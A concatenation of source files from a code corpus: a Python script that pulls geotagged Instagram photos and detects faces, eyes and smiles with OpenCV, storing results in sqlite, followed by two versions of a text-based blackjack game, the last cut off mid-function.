"path": "CarletonCourses/RandomSentence.py",
"copies": "1",
"size": "3832",
"license": "mit",
"hash": -8370381973086177000,
"line_mean": 52.2222222222,
"line_max": 204,
"alpha_frac": 0.6787578288,
"autogenerated": false,
"ratio": 4.215621562156215,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5394379390956215,
"avg_score": null,
"num_lines": null
} |
"""A program to
1. Make an api call to instragram to get photos from a geographic location
2. Attempt to detect faces in the images
3. Store the metadata in sqlite3
Example call from command line is:
python face.py -l 40.7359 -g -73.9903086 -m [CURRENT TIMESTAMP] -t [TIME STAMP OF HOW FAR BACK YOU WANT TO GO] -c [YOUR_CLIENT_ID]
Currently it will pull 10 images for each ten minute block between -m and -t.
You can play with those settings by changing:
self.num_photos = 10
in the API_call() class
or
changing the 600 seconds to something else in:
return new_max_timestamp - 600
in the def get_new_max_timestamp
"""
import numpy as np
import pandas as pd
import cv2
import os
import json
from PIL import Image
import urllib2
import cStringIO
import time
import sys
import getopt
import sqlite3
from socket import error as SocketError
# for the cascades to work you need install CV2 and point these to your local dir. Install cv2 by finding the right instructions for your computer's os http://docs.opencv.org/doc/tutorials/introduction/table_of_content_introduction/table_of_content_introduction.html
FACE_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
EYE_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_eye.xml')
MOUTH_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_mcs_mouth.xml')
SMILE_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_smile.xml')
class API_call():
""" Makes api calls to instragram's media search endpoint"""
def __init__(self, lat, lng, max_timestamp, client_id):
self.lat = lat
self.lng = lng
self.max_timestamp = max_timestamp
self.client_id = client_id
self.num_photos = 10
self.api_endpoint = "https://api.instagram.com/v1/media/search?lat=%s&lng=%s&max_timestamp=%s&distance=5000&client_id=%s&count=%s" % (self.lat, self.lng, self.max_timestamp, self.client_id, self.num_photos)
self.response = urllib2.urlopen(self.api_endpoint)
self.data = json.load(self.response)
class Img():
""" Object created for each image
Input Variables
entry: the api call data for a specific image
api_call_lat: the latitude of where the api call was centered
api_call_lng: the longitude of where the api call was centered
Class Variables:
self.url: url of image
self.low_resolution_url: low res url of image
self.thumbnail_url: thumbnail url of image
self.users_in_photo: users tagged in the photo
self.tags: hashtages on the photo
self.lat: lat of the photo
self.lng: lng of the photo
self.filter: filter applied to photo
self.created_time: timestamp of the photo creation
self.id: instagram's id of the photo
self.link: link to the instagram front end web interface of the photo
self.username: owner of photo's username
self.color_image: actual color image represented in numpy array
self.grayscale_image: actual color image represented in numpy array
self.faces_rois: numpy array of grayscale image that might be a face
self.faces: collection of four points that bound a potential face in a box that is generated from the haar cascade.
self.num_faces: len(self.faces_rois)
self.caption: caption on photo by user
self.api_call_lat: the latitude of where the api call was centered
self.api_call_lng: the longitude of where the api call was centered
"""
def __init__(self, entry, api_call_lat, api_call_lng):
self.url = entry['images']['standard_resolution']['url']
self.low_resolution_url = entry['images']['low_resolution']['url']
self.thumbnail_url = entry['images']['thumbnail']['url']
if entry['users_in_photo'] != []:
self.users_in_photo = entry['users_in_photo']
else:
self.users_in_photo = None
self.tags = entry['tags']
self.lat = entry['location']['latitude']
self.lng = entry['location']['longitude']
self.filter = entry['filter']
self.created_time = entry['created_time']
self.id = entry['id']
self.link = entry['link']
self.username = entry['user']['username']
self.color_image = self._create_opencv_image_from_url()
self.grayscale_image = self._create_grayscale_image()
self.faces_rois, self.faces = self._detect_faces()
self.num_faces = len(self.faces_rois)
try:
self.caption = entry['caption']['text']
except TypeError:
self.caption = ""
self.api_call_lat = api_call_lat
self.api_call_lng = api_call_lng
def _create_opencv_image_from_url(self, cv2_img_flag = 1):
""" Get image from URL and convert to an openCV image."""
request = urllib2.urlopen(self.url)
img_array = np.asarray(bytearray(request.read()), dtype=np.uint8)
return cv2.imdecode(img_array, cv2_img_flag)
def _create_grayscale_image(self):
""" Turn color image into grayscale."""
return cv2.cvtColor(self.color_image, cv2.COLOR_BGR2GRAY)
def _detect_faces(self):
""" Detect faces in the image. Returns an empty list if no faces. """
faces = FACE_CASCADE.detectMultiScale(self.grayscale_image, scaleFactor = 1.05, minNeighbors = 3)
faces_rois = []
for (x,y,w,h) in faces:
self._draw_rectangle(self.color_image, (x,y), (x+w,y+h), (255,0,0))
faces_rois.append(self.grayscale_image[y:y+h, x:x+w])
return faces_rois, faces
def _draw_rectangle(self, image, pt1, pt2, color, thickness = 2):
""" Draw rectangle around a region of interests with a arbitrary color. """
cv2.rectangle(image, pt1, pt2, color, thickness)
def show_color_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.color_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def show_grayscale_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.grayscale_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def has_faces(self):
""" Returns True if more than one face is detected. """
if len(self.faces_rois) > 0:
return True
return False
class Face():
""" Object for a detected face region of interest in an img object.
Each image has 0 or more faces.
Input variables
url: url of original image
color_image: the color image from the url
grayscale_image: the grayscale image from the url
face_roi: numpy array of grayscale image that might be a face
face_xywh: the four points that bound a this specific potential face in a box that is generated from the haar cascade. Comes from self.faces in Img class.
Class variables:
self.eyes_rois: numpy array of grayscale image that might be eyes
self.eyes_xywh_relative: position of eyes relative to face_roi
self.eyes_xywh_absolute: position of eyes in relation to the whole image
self.roi_gray_below_eyes: area below the eyes to look for a mouth in grayscale
self.roi_color_below_eyes: area below the eyes to look for a mouth in color
self.mouth_rois: numpy array of grayscale image that might be a mouth
self.mouth_xywh_relative: position of mouth relative to face_roi
self.mouth_xywh_absolute: position of mouth in relation to the whole image
self.smile_rois: numpy array of grayscale image that might be a smile
self.smile_xywh_relative: position of smile relative to face_roi
self.smile_xywh_absolute: position of smile in relation to the whole image
"""
def __init__(self, url, color_image, grayscale_image, face_roi, face_xywh):
self.url = url
self.color_image = color_image
self.grayscale_image = grayscale_image
self.face_roi = face_roi
self.face_xywh = face_xywh
self.eyes_rois, self.eyes_xywh_relative, self.eyes_xywh_absolute = self._detect_eyes()
if self.has_two_eyes():
self.roi_gray_below_eyes, self.roi_color_below_eyes = self._create_roi_below_eyes()
self.mouth_rois, self.mouth_xywh_relative, self.mouth_xywh_absolute = self._detect_mouths()
self.smile_rois, self.smile_xywh_relative, self.smile_xywh_absolute = self._detect_smiles()
def _detect_eyes(self):
""" Detect eyes in the image. Returns an empty list if no eyes. """
eyes_xywh_relative = EYE_CASCADE.detectMultiScale(self.face_roi, scaleFactor = 1.05, minNeighbors = 3)
eyes_rois = []
eyes_xywh_absolute = []
for x, y, w, h in eyes_xywh_relative:
self._draw_rectangle(self.face_roi, (x,y), (x+w,y+h), (0,255,0))
x1, x2, y1, y2 = self._eye_math(x,y,w,h)
eyes_rois.append(self.color_image[y1:y2, x1:x2])
eyes_xywh_absolute.append([x1, x2, y1, y2])
return eyes_rois, eyes_xywh_relative, eyes_xywh_absolute
def _create_roi_below_eyes(self):
""" Takes the face roi and limits it to the region below the eyes. This will let
the mouth cascades just search in that region instead of looking at the whole face.
Get x,y coords with width and height. """
x_face, y_face, w_face, h_face = self.face_xywh
y_eyes = y_face + self.eyes_xywh_relative[0][1] + int(self.eyes_xywh_relative[0][3]*1.5)
face_bottom = h_face - self.eyes_xywh_relative[0][1] - int(self.eyes_xywh_relative[0][3]*1.5)
roi_gray_below_eyes = self.grayscale_image[y_eyes:y_eyes+face_bottom, x_face:x_face+w_face]
roi_color_below_eyes = self.color_image[y_eyes:y_eyes+face_bottom, x_face:x_face+w_face]
return roi_gray_below_eyes, roi_color_below_eyes
def _detect_mouths(self):
""" Detect mouth in the image. Returns an empty list if no mouth. """
mouth_xywh_relative = MOUTH_CASCADE.detectMultiScale(self.roi_gray_below_eyes, scaleFactor = 1.05, minNeighbors = 3)
mouth_rois = []
mouth_xywh_absolute = []
for x,y,w,h in mouth_xywh_relative:
self._draw_rectangle(self.roi_color_below_eyes, (x,y), (x+w,y+h), (0,0,0))
x1, x2, y1, y2 = self._mouth_math(x,y,w,h)
mouth_rois.append(self.color_image[y1:y2, x1:x2])
mouth_xywh_absolute.append([x1, x2, y1, y2])
return mouth_rois, mouth_xywh_relative, mouth_xywh_absolute
def _detect_smiles(self):
""" Detect smile in the image. Returns an empty list if no mouth. """
smile_xywh_relative = SMILE_CASCADE.detectMultiScale(self.roi_gray_below_eyes, scaleFactor = 1.05, minNeighbors = 3)
smile_rois = []
smile_xywh_absolute = []
for x, y, w, h in smile_xywh_relative:
self._draw_rectangle(self.roi_color_below_eyes, (x,y), (x+w,y+h), (255,255,255))
x1, x2, y1, y2 = self._mouth_math(x,y,w,h)
smile_rois.append(self.color_image[y1:y2, x1:x2])
smile_xywh_absolute.append([x1, x2, y1, y2])
return smile_rois, smile_xywh_relative, smile_xywh_absolute
def _eye_math(self, x, y, w, h):
""" Returns points from the eye roi that are in context of the whole image, not just the eye roi """
x1 = self.face_xywh[0]+x
x2 = self.face_xywh[0]+x+w
y1 = self.face_xywh[1]+y
y2 = self.face_xywh[1]+y+h
return x1, x2, y1, y2
def _mouth_math(self, x, y, w, h):
""" Returns points from the mouth roi that are in context of the whole image, not just the mouth roi """
x1 = self.face_xywh[0]+x
x2 = self.face_xywh[0]+x+w
y1 = self.face_xywh[1]+self.eyes_xywh_relative[0][1]+int(self.eyes_xywh_relative[0][3]*1.5)+y
y2 = self.face_xywh[1]+self.eyes_xywh_relative[0][1]+int(self.eyes_xywh_relative[0][3]*1.5)+y+h
return x1, x2, y1, y2
def _draw_rectangle(self, image, pt1, pt2, color, thickness = 2):
""" Draw rectangle around a region of interests with a arbitrary color. """
cv2.rectangle(image, pt1, pt2, color, thickness)
def show_color_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.color_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def show_grayscale_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.grayscale_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def has_two_eyes(self):
""" Returns True if two eyes are detected. """
if len(self.eyes_rois) == 2:
return True
return False
def has_one_mouth(self):
""" Returns true if only one mouth. """
if len(self.mouth_rois) == 1:
return True
return False
def has_zero_or_one_smile(self):
""" Returns true if it has zero or one smiles. """
if len(self.smile_rois) <= 1:
return True
return False
def main(argv):
"""The main function that strings together the classes and the non class methods.
It does the following:
1. Make an api call to instragram to get photos from a geographic location
2. Attempt to detect faces in the images
3. Store the metadata in sqlite3
Example call from command line is:
python face.py -l 40.7359 -g -73.9903086 -m 1424235599 -t 1424149199 -c [YOUR_CLIENT_ID]
Input variables passed via flags
api_call_lat: the latitude of where the api call was centered
api_call_lng: the latitude of where the api call was centered
max_timestamp: The largest possible timestamp you want an image to have. (note instagram api does not always respect this precisely, but it is usually pretty close)
min_timestamp: The smallest possible timestamp you want an image to have. (note instagram api does not always respect this precisely, but it is usually pretty close)
client_id: Your instagram api client id
This function has time.sleep() in a few places since you have to call the images from the web. The api only gives you the metadata and we dont want to slam their servers.
"""
api_call_lat, api_call_lng, max_timestamp, min_timestamp, client_id = parse_cmd_args(argv)
calls_made = 0
face_count = 0
t1 = time.time()
conn, cursor = db_connect()
already_in_db = cursor.execute("SELECT instagram_id from images").fetchall()
processed_images = set([str(x[0]) for x in already_in_db])
socket_error_ids = []
while max_timestamp > min_timestamp:
images = get_image_entries_from_api(api_call_lat, api_call_lng, max_timestamp, client_id)
for entry in images:
try:
img = Img(entry, api_call_lat, api_call_lng)
if is_new_image(img.id, processed_images):
print img.url + "\n" + img.created_time
image_table_id = insert_in_image_db_and_return_id(img, cursor)
for possible_face, face_xywh in zip(img.faces_rois, img.faces):
face = Face(img.url, img.color_image, img.grayscale_image, possible_face, face_xywh)
if face.has_two_eyes() and face.has_one_mouth() and face.has_zero_or_one_smile():
print "face_found"
insert_in_face_db(face, image_table_id, img.url, cursor)
face_count += 1
conn.commit()
print "commited to db"
save_image_to_disk(img)
except cv2.error:
continue
except SocketError as E:
print "socket error, connection reset by peer, pausing for 3 minutes"
time.sleep(180)
socket_error_ids.append(entry['id'])
time.sleep(1)
max_timestamp = get_new_max_timestamp(max_timestamp, img.created_time)
calls_made += 1
print str(face_count) + " faces found through loop " + str(calls_made)
print "pausing for 3 seconds"
time.sleep(3)
conn.close()
print 'time taken is ' + str(time.time() - t1)
print "the following images failed due to socket hangups"
print socket_error_ids
def parse_cmd_args(argv):
""" Turns command line flags into variables """
try:
opts, args = getopt.getopt(argv,"hl:g:m:t:c:",["lat=", "lng=", "max_timestamp=", "min_timestamp=", "client_id="])
except getopt.GetoptError:
print 'face.py face.py "-l --lat, -g --lng, -m --max_timestamp, -c --client_id="'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'face.py "-l --lat, -g --lng, -m --max_timestamp, -c --client_id="'
sys.exit()
elif opt in ("-l", "--lat"):
api_call_lat = float(arg)
elif opt in ("-g", "--lng"):
api_call_lng = float(arg)
elif opt in ("-m", "--max_timestamp"):
max_timestamp = int(arg)
elif opt in ("-t", "--min_timestamp"):
min_timestamp = int(arg)
elif opt in ("-c", "--client_id"):
client_id = str(arg)
else:
assert False, "unhandled option"
return api_call_lat, api_call_lng, max_timestamp, min_timestamp, client_id
def db_connect():
""" Connect to sqlite db. """
conn = sqlite3.connect('face.db')
cursor = conn.cursor()
return conn, cursor
def get_image_entries_from_api(api_call_lat, api_call_lng, max_timestamp, client_id):
""" Gets images from the api """
response = API_call(lat = api_call_lat, lng = api_call_lng, max_timestamp = max_timestamp, client_id = client_id)
images = [entry for entry in response.data['data'] if entry['type'] == 'image']
return images
def insert_in_image_db_and_return_id(img, cursor):
""" Insert the attributes into the db
Vars like img.faces have to have some conversion because cv2 haar cascades
return either numpy.ndarray or a empty (). So we convert ()) to a list
so they all have the same datatype.
Retuns the key of the image for storing in the faces db for joins later. """
if img.faces != ():
faces_for_db = img.faces.tolist()
else:
faces_for_db = []
row = [
img.url,
img.low_resolution_url,
img.thumbnail_url,
json.dumps(img.users_in_photo),
json.dumps(img.tags),
img.lat,
img.lng,
img.filter,
img.created_time,
img.id,
img.link,
img.username,
json.dumps(faces_for_db),
img.caption,
img.api_call_lat,
img.api_call_lng
]
cursor.execute("INSERT INTO images VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", row)
return cursor.lastrowid
def insert_in_face_db(face, image_table_id, url, cursor):
""" Insert the attributes into the db
variables with relative are numpy arrays
variables with abosulte are a python array.
absolute variables should not need conversion but was failing
with error TypeError: 351 is not JSON serializable.
However it works in terminal. So we convert the
list to a numpy array and then back to a list. Hackey workaround for now.
"""
eyes_xywh_absolute = np.asarray(face.eyes_xywh_absolute)
mouth_xywh_absolute = np.asarray(face.mouth_xywh_absolute)
smile_xywh_absolute = np.asarray(face.smile_xywh_absolute)
if face.smile_xywh_relative != ():
smile_xywh_relative = face.smile_xywh_relative.tolist()
else:
smile_xywh_relative = []
row = [
image_table_id,
url,
json.dumps(face.face_xywh.tolist()),
json.dumps(face.eyes_xywh_relative.tolist()),
json.dumps(eyes_xywh_absolute.tolist()),
json.dumps(face.mouth_xywh_relative.tolist()),
json.dumps(mouth_xywh_absolute.tolist()),
json.dumps(smile_xywh_relative),
json.dumps(smile_xywh_absolute.tolist())
]
cursor.execute("INSERT INTO faces VALUES (?,?,?,?,?,?,?,?,?)", row)
def is_new_image(image_id, processed_images):
""" Checks if image has already been processed since instagram api sometimes
does not respect max_timestamp. See
http://stackoverflow.com/questions/23792774/instagram-api-media-search-endpoint-not-respecting-max-timestamp-parameter
and http://stackoverflow.com/questions/25155620/instagram-api-media-search-max-timestamp-issue
"""
if image_id in processed_images:
print 'seen image_id %s before, skipping it' % image_id
return False
processed_images.add(image_id)
return True
def save_image_to_disk(img):
"""Save image to local storage. """
cv2.imwrite("images/" + img.id + ".jpg",img.color_image)
cv2.imwrite("grayscale_images/" + img.id + ".jpg", img.grayscale_image)
def get_new_max_timestamp(last_max_timestamp, current_image_timestamp):
""" Gives the smaller of the last max timestamp vs the last image's timestamp.
Then it subtracts 600 seconds from that. This is needed because the instagram
API does not always respect max_timestamp and you could get stuck in a loop
where all photos have a max_timestamp greater than what was set
"""
new_max_timestamp = min(last_max_timestamp, current_image_timestamp)
return new_max_timestamp - 600
if __name__ == '__main__':
main(sys.argv[1:]) | {
"repo_name": "andrewjtimmons/selfieexpression",
"path": "face.py",
"copies": "1",
"size": "20276",
"license": "mit",
"hash": 8533627074403147000,
"line_mean": 40.8082474227,
"line_max": 267,
"alpha_frac": 0.6820378773,
"autogenerated": false,
"ratio": 3.170602032838155,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4352639910138155,
"avg_score": null,
"num_lines": null
} |
## A program to play Blackjack
## By BlueHat GURU
## Written in Python 3.4.1
# Assumption: players already know how to play blackjack, and do not require educating.
# This is just defining a deck of cards, returning it as a list in numerical_suit order.
card_values = ('ace', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'jack', 'queen', 'king')
deck_suits = ('_clubs', '_diamonds', '_hearts', '_spades')
deckofcards = [ value+suit for value in card_values for suit in deck_suits]
#build a dictionary of card values for the handvalue calculation
card_value_dictionary = {}
card_value_counter = 0
for card in card_values:
card_value_counter = card_value_counter + 1
if card_value_counter > 10:
card_value_counter = 10
card_value_dictionary[card[:3]] = card_value_counter
#import a couple of packages that blackjack won't run without
import random
import math
#A string which will be used in several places.
failuretocomply = """
Local laws forbid us from taking money from people
who can't understand our instructions.
I'm going to have to ask you to leave."""
def playgame(playerchips=100, quittracker = False):
#loops until the player looses all chips or quits
print('Welcome to our casino. You have ' + str(playerchips) + ' chips to play with.')
numberdecks, quittracker = get_number_decks(quittracker)
tabledeck= bigdeckmaker(numberdecks)
random.shuffle(tabledeck)
random.shuffle(tabledeck) # seems to work better with two
useddeck = []
while (playerchips > 0 and quittracker == False):
playerbet, quittracker = get_number_bet(playerchips, quittracker)
if quittracker: # make sure the player just leaves if they give a bad answer
break
bet_result, tabledeck, useddeck, quittracker = playhand(playerbet, playerchips, tabledeck, useddeck, quittracker)
playerchips = playerchips + bet_result
print('You now have ' + str(playerchips) + ' chips.')
if quittracker == False:
quittracker = quit_query()
print('You leave the casino with ' + str(playerchips) + ' chips.')
def playhand(bet_valueph, playerchipsph, deckatthetable, usedcards, quittrackerph):
#function to actually play through a hand
playerhandph=[]
dealerhandph=[]
playerhandvalue = 0
dealerhandvalue = 0
playerstand = False
deckatthetable, playerhandph, usedcards = dealto(deckatthetable, playerhandph, usedcards)
handstatement(playerhandph, 'Your')
deckatthetable, dealerhandph, usedcards = dealto(deckatthetable, dealerhandph, usedcards)
handstatement(dealerhandph, 'The dealer\'s')
deckatthetable, playerhandph, usedcards = dealto(deckatthetable, playerhandph, usedcards)
handstatement(playerhandph, 'Your')
while ( (playerhandvalue < 21) and (playerstand != True)):
bet_valueph, playerstand, playerhandph, deckatthetable, usedcards, quittrackerph = \
playerdecision_dialog(bet_valueph, playerchipsph, playerstand, playerhandph, deckatthetable, usedcards, quittrackerph)
if quittrackerph: # make sure the player just leaves if they give a bad answer
break
playerhandvalue = handvalue(playerhandph)
handstatement(playerhandph, 'Your')
while ( dealerhandvalue < 17) and (quittrackerph == False):
deckatthetable, dealerhandph, usedcards = dealto(deckatthetable, dealerhandph, usedcards)
dealerhandvalue = handvalue(dealerhandph)
handstatement(dealerhandph, 'The dealer\'s')
#int(bet_valueph)
bet_resultph = bet_result(bet_valueph, playerhandph, dealerhandph)
usedcards = usedcards + playerhandph + dealerhandph
return bet_resultph, deckatthetable, usedcards, quittrackerph
def dealto(deckdealtfrom, deckdealtto, sparedeck):
#dealing a card, and altering appropriate decks/hands; also to reincorporate used cards if we run out
if len(deckdealtfrom)<=0:
deckdealtfrom.extend(sparedeck)
random.shuffle(deckdealtfrom)
del sparedeck[:]
deckdealtto.append(deckdealtfrom.pop())
return deckdealtfrom, deckdealtto, sparedeck
def handstatement(handtoprint, userflag):
handstring = ''
for card in range(len(handtoprint)):
handstring = handstring + ' ' + handtoprint[card] + ','#try to incorporate proper english at some point
handvaluestring = str(handvalue(handtoprint))
#print(userflag + ' hand is ' + handstring + '.')
print(userflag + ' hand is ' + handstring + ' worth '+ handvaluestring + '.')
def playerdecision_dialog(bet_valuepd, playerchipspd, playerstandpd, playerhandpd, deckdealtfromph, usedcardspd, quittrackerpd, retries=6, decideflag = False):
#dialog asking the player what action they want this hand.
while (retries > 0) and (decideflag == False):
playeraction = input('Do you want to hit, stand, or double? ')
if playeraction in ('h', 'hi', 'ht', 'hit'):
deckdealtfromph, playerhandpd, usedcardspd = dealto(deckdealtfromph, playerhandpd, usedcardspd)
decideflag = True
elif playeraction in ('s', 'st', 'sta', 'stan', 'stand'):
playerstandpd = True
decideflag = True
elif playeraction in ('d', 'do', 'dou', 'doub', 'doubl', 'double' ):
if 2*bet_valuepd > playerchipspd:
print('I\'m sorry, you can\'t bet more chips than you have.')
retries = retries - 1
else:
bet_valuepd = 2*bet_valuepd
deckdealtfromph, playerhandpd, usedcardspd = dealto(deckdealtfromph, playerhandpd, usedcardspd)
playerstandpd = True
decideflag = True
#will need to add 'surrender' and 'split' here, if implemented
#elif playeraction in ('surren', 'surrender'): # supposed to only be available on first decision of hand, and results in quit game -> complicated
# playerstandpd = True
# bet_valuepd = bet_valuepd - int(bet_valuepd/2)
# decideflag = True
#elif playeraction in ('sp', 'spl', 'spli', 'split'):
# supposed to only be available on first decision of hand, and results in two player hands -> complicated
#decideflag = True
else:
retries = retries - 1
print('I am sorry, I did not understand what you said. Could you repeat it, please?')
if retries <= 0:
quittrackerpd = True
print(failuretocomply)
bet_valuepd = 0
return bet_valuepd, playerstandpd, playerhandpd, deckdealtfromph, usedcardspd, quittrackerpd
def handvalue(handlist): # to compute what a hand is worth
handinteger = 0
ace_present = False
for card_in_hand in handlist:
if card_in_hand[:3] in list(card_value_dictionary.keys()):
handinteger = handinteger + card_value_dictionary[card_in_hand[:3]]
if card_in_hand[:3] == 'ace':
ace_present = True
#The player will never wish to count more than one ace as an 11
if (ace_present == True) and (handinteger + 10 <= 21):
handinteger = handinteger + 10
return handinteger
def bet_result(betvaluebr, playerhandbr, dealerhandbr):
playerblackjackbr = black_jack_check(playerhandbr)
playerhandvalue = handvalue(playerhandbr)
dealerblackjackbr = black_jack_check(dealerhandbr)
dealerhandvalue = handvalue(dealerhandbr)
if playerhandvalue > 21:
betmodifier = -1
elif dealerhandvalue > 21 and playerhandvalue <= 21:
betmodifier = 1
elif dealerhandvalue <= 21 and playerhandvalue <= 21:
if playerhandvalue > dealerhandvalue:
betmodifier = 1
elif playerhandvalue < dealerhandvalue:
betmodifier = -1
elif playerhandvalue == dealerhandvalue:
if (playerblackjackbr == True) and (dealerblackjackbr == False):
betmodifier = 1
elif (playerblackjackbr == False) and (dealerblackjackbr == True):
betmodifier = -1
else:
betmodifier = 0
if playerblackjackbr == True:
betmodifier = (3/2)*betmodifier
betresultbr = int(betmodifier * betvaluebr)
return betresultbr
def black_jack_check(handtocheckbjc, isblackjack = False):
tenfacelist = []
for cardvaluebjc in card_values[8:12]:
tenfacelist = tenfacelist + [cardvaluebjc[:3]]
if len(handtocheckbjc) == 2:
if (handtocheckbjc[0][:3] in ['ace']) and (handtocheckbjc[1][:3] in tenfacelist):
isblackjack = True
elif (handtocheckbjc[1][:3] in ['ace']) and (handtocheckbjc[0][:3] in tenfacelist):
isblackjack = True
return isblackjack
def bigdeckmaker(numberofdecks, fulldeck=deckofcards):
#takes an integer number of decks and combines them into one big deck
loopvar = numberofdecks
makedeck = []
loopdeck = fulldeck
while loopvar > 0:
makedeck.extend(loopdeck[:])
loopvar = loopvar -1
return makedeck
def get_number_from_player(playermaxchoice, maxstring, inputstring, minstring, quittrackergnfp, retries=6):
#dialog asking player to choose a number, used for both making bets and picking tables.
while (retries > 0) :
playerchoice = input(inputstring)
if len(playerchoice) < 1:
playerchoice='user input error'
elif playerchoice[0] in [ str(range(10)[i]) for i in range(10)]:
playerchoice_int = int(playerchoice)
if (playerchoice_int <= playermaxchoice) and (playerchoice_int >0):
return playerchoice_int, quittrackergnfp
elif playerchoice_int < 1:
print(minstring+' Try again.')
else:
print(maxstring + str(playermaxchoice) + '. Try again.')
else:
print('Please enter an integer.')
retries = retries - 1
if retries <= 0:
print(failuretocomply)
quittrackergnfp = True
return 0, quittrackergnfp
def get_number_bet(totalplayerchips, quittrackergnb):
# written like this for convenience
betmaxstring = 'You may bet at most '
betinputstring = 'Please type how many chips would you like to bet: '
betminstring = 'You must bet at least one.'
numberofchips, quittrackergnb = get_number_from_player(totalplayerchips, betmaxstring, betinputstring, betminstring, quittrackergnb)
return numberofchips, quittrackergnb
def get_number_decks(quittrackergnd):
# written like this for convenience
deckmaxstring = 'You may choose at most '
deckinputstring = 'Please choose how many decks your table is using: '
deckminstring = 'You can\'t play with less than one deck of cards.'
numberofdecks, quittrackergnd = get_number_from_player(8, deckmaxstring, deckinputstring, deckminstring, quittrackergnd)
return numberofdecks, quittrackergnd
def quit_query(retries=4):
while (retries > 0):
ok = input('Do you want to keep playing, Yes or No? ')
if ok in ('y', 'ye', 'yes'):
return False
if ok in ('n', 'no', 'nop', 'nope'):
return True
retries = retries - 1
if retries < 0:
print(failuretocomply)
print('Yes or no, please!')
if __name__ == "__main__":
playgame()
| {
"repo_name": "BlueHat-GURU/python-blackjack",
"path": "blackjacktwod.py",
"copies": "1",
"size": "11579",
"license": "mit",
"hash": 7946796325190315000,
"line_mean": 34.6276923077,
"line_max": 159,
"alpha_frac": 0.6480697815,
"autogenerated": false,
"ratio": 3.681717011128776,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9738748109115671,
"avg_score": 0.018207736702620957,
"num_lines": 325
} |
## A program to play Blackjack
## By BlueHat GURU
## Written in Python 3.4.1
""" Assumption: players already know how to play blackjack,
and do not require educating."""
"""This is just defining a deck of cards,
returning it as a list in numerical_suit order."""
card_values = ('ace', 'two', 'three', 'four', 'five', 'six', 'seven',\
'eight', 'nine', 'ten', 'jack', 'queen', 'king')
deck_suits = ('_clubs', '_diamonds', '_hearts', '_spades')
deckofcards = [ value+suit for value in card_values for suit in deck_suits]
"""build a dictionary of card values for the handvalue calculation"""
card_value_dictionary = {}
card_value_counter = 0
for card in card_values:
card_value_counter = card_value_counter + 1
if card_value_counter > 10:
card_value_counter = 10
card_value_dictionary[card[:3]] = card_value_counter
"""import a couple of packages that blackjack won't run without."""
import random
import math
#A string which will be used in several places.
failuretocomply = """
Local laws forbid us from taking money from people
who can't understand our instructions.
I'm going to have to ask you to leave."""
# Naming conventions:
"""
shoedeck = the deck being dealt from at the table.
dealerdeck = the dealer's deck/hand
playerdeck = the player's deck/hand
useddeck = where the used cards go.
bet_value = how many chips the player is betting
bet_result = above, with appropriate modifiers
playerchips = the total of how many chips the player has
quittracker = a boolean noting whether the player wants to quit,
or is getting ejected.
dealerhandvalue = the integer value of the dealer's hand.
playerhandvalue = the integer value of the player's hand.
numberofdecks = how many decks are in the shoe at the table the player is at.
playerstand = boolean set to true of the player stands
Suffix local versions of these variables with
the initials of the function they appear in.
Don't bother with purely local variables or retries.
"""
def playgame(playerchipspg=100, quittrackerpg = False):
"""They core function that calls all others to play the game.
Has an initial setup block.
Then loops until the player looses all chips or quits."""
print('Welcome to our casino. You have ' + str(playerchipspg) +\
' chips to play with.')
numberofdeckspg, quittrackerpg = get_number_decks(quittrackerpg)
shoedeckpg = bigdeckmaker(numberofdeckspg)
random.shuffle(shoedeckpg)
random.shuffle(shoedeckpg) # seems to be more thoroughly shuffled with two
useddeckpg = []
while (playerchipspg > 0 and quittrackerpg == False):
bet_valuepg, quittrackerpg =\
get_number_bet(playerchipspg, quittrackerpg)
if quittrackerpg: # eject the player for bad answers
break
bet_resultpg, shoedeckpg, useddeckpg, quittrackerpg =\
playhand(bet_valuepg, playerchipspg, shoedeckpg,\
useddeckpg, quittrackerpg)
playerchipspg = playerchipspg + bet_resultpg
print('You now have ' + str(playerchipspg) + ' chips.')
if quittrackerpg == False:
quittrackerpg = quit_query()
print('You have ' + str(playerchipspg) + ' chips as you leave the casino.')
def playhand(bet_valueph, playerchipsph, shoedeckph,\
useddeckph, quittrackerph):
"""Plays through a hand.
Initializes internal control variables.
Does an initial deal (the dealer gets one card, the player two).
Loops through the player playing their hand.
Loops through the dealer hitting until >= 17.
Calls another function to calculate the result of the bet.
Puts the cards in the hands into the used card pile."""
playerdeckph=[]
dealerdeckph=[]
playerhandvalueph = 0
dealerhandvalueph = 0
playerstandph = False
deckatthetable, playerdeckph, useddeckph =\
dealto(shoedeckph, playerdeckph, useddeckph)
handstatement(playerdeckph, 'Your')
deckatthetable, dealerdeckph, useddeckph =\
dealto(shoedeckph, dealerdeckph, useddeckph)
handstatement(dealerdeckph, 'The dealer\'s')
deckatthetable, playerdeckph, usedcards =\
dealto(shoedeckph, playerdeckph, useddeckph)
handstatement(playerdeckph, 'Your')
while ( (playerhandvalueph < 21) and (playerstandph != True)):
bet_valueph, playerstandph, playerhandph,\
shoedeckph, useddeckph, quittrackerph = \
playerdecision_dialog(bet_valueph, playerchipsph,\
playerstandph, playerdeckph,\
shoedeckph, useddeckph,\
quittrackerph)
if quittrackerph: # eject the player for bad answers
break
playerhandvalueph = handvalue(playerdeckph)
handstatement(playerdeckph, 'Your')
while ( dealerhandvalueph < 17) and (quittrackerph == False):
